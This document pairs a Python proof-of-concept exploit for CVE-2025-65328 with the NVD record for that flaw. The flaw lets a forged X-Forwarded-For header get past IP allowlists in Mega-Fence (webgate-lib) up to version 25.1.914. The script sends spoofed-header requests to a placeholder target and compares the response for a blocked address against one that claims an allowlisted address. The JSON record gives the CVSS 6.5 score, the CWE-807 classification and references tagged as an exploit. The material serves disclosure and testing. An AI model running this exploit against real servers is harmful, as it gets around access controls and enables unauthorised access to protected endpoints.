CVE-2025-65328

import requests # CVE-2025-65328 PoC - X-Forwarded-For IP Spoofing # Target: Mega-Fence (webgate-lib.*) <= 25.1.914 def exploit_xff_spoofing(target_url, spoofed_ip): """ Exploit for CVE-2025-65328 Mega-Fence trusts X-Forwarded-For header without proxy chain validation Args: target_url: Target application URL spoofed_ip: IP address to spoof """ headers = { 'X-Forwarded-For': spoofed_ip, 'User-Agent': 'Mozilla/5.0 (CVE-2025-65328 PoC)' } try: response = requests.get(target_url, headers=headers, timeout=10) print(f"[*] Request sent with X-Forwarded-For: {spoofed_ip}") print(f"[*] Status Code: {response.status_code}") print(f"[*] WG_CLIENT_IP Cookie: {response.cookies.get('WG_CLIENT_IP', 'Not found')}") return response except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None def test_ip_allowlist_bypass(target_url, blocked_ip, whitelist_ip): """ Test IP allowlist bypass using XFF spoofing """ # First, try with blocked IP print("\n[1] Testing with blocked IP...") exploit_xff_spoofing(target_url, blocked_ip) # Then, try to bypass with spoofed whitelisted IP print("\n[2] Attempting bypass with spoofed IP...") exploit_xff_spoofing(target_url, whitelist_ip) if __name__ == "__main__": # Configuration target = "https://vulnerable-server.com/protected-endpoint" spoofed_ip = "10.0.0.1" # Example: Whitelisted IP blocked_ip = "192.168.1.100" print("=" * 50) print("CVE-2025-65328 PoC - XFF IP Spoofing") print("=" * 50) exploit_xff_spoofing(target, spoofed_ip)

{"cve": {"id": "CVE-2025-65328", "sourceIdentifier": "[email protected]", "published": "2026-01-05T16:15:42.763", "lastModified": "2026-01-30T01:35:38.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mega-Fence (webgate-lib.*) 25.1.914 and prior trusts the first value of the X-Forwarded-For (XFF) header as the client IP without validating a trusted proxy chain. An attacker can supply an arbitrary XFF value in a remote request to spoof the client IP, which is then propagated to security-relevant state (e.g., WG_CLIENT_IP cookie). Deployments that rely on this value for IP allowlists may be bypassed."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-807"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mega-fence_project:mega-fence:*:*:*:*:*:*:*:*", "versionEndIncluding": "25.1.914", "matchCriteriaId": "36D2A6D4-72EC-4C0B-96C4-34AFDD4762A6"}]}]}], "references": [{"url": "https://drive.proton.me/urls/MY05PVBFXG#xDd2Xqy98WM9", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://raw.githubusercontent.com/p1aintext/CVE/main/CVE-2025-65328.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}